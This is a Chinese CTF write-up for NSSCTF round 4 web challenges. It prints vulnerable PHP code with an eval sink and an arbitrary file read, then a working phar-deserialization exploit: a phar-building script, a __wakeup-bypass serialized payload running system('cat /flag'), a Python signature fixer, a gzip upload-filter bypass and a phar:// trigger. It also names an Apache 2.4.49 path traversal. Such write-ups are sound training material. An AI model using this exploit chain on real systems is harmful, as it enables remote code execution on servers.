[NSSCTF]roud4 web

1zweb/(revenge)

非预期：直接读/flag

读一下index.php

class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

upload.php

if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }

很明显是一个phar反序列化：

class LoveNss{
    public $ljt = "Misc";
    public $dky = "Re";
    public $cmd = "system('cat /flag');";
}

$a=new LoveNss();
unlink('phar.phar');
$phar = new Phar('phar.phar');
$phar->setStub('GIF89a'.'');
$phar->setMetadata($a);
$phar->addFromString('1.txt','dky');
?>

由于需要绕过wakeup方法，所以需要修改一下属性，修改属性之后同时需要修改签名

O:7:"LoveNss":4:{s:3:"ljt";s:4:"Misc";s:3:"dky";s:2:"Re";s:3:"cmd";s:20:"system('cat /flag');";}

修改签名

import gzip
from hashlib import sha1
f = open('phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('pha.phar', 'wb').write(newf) # 写入新文件

之后在文件上传页面对字符进行了过滤，我们可以利用zip压缩的方式绕过，压缩后更改后缀为png上传

file=phar://./upload/pha.png/pha.phar

ez_rce

Apache2.4.49目录穿越

这里构造了几层套娃，爆破一下

得到flag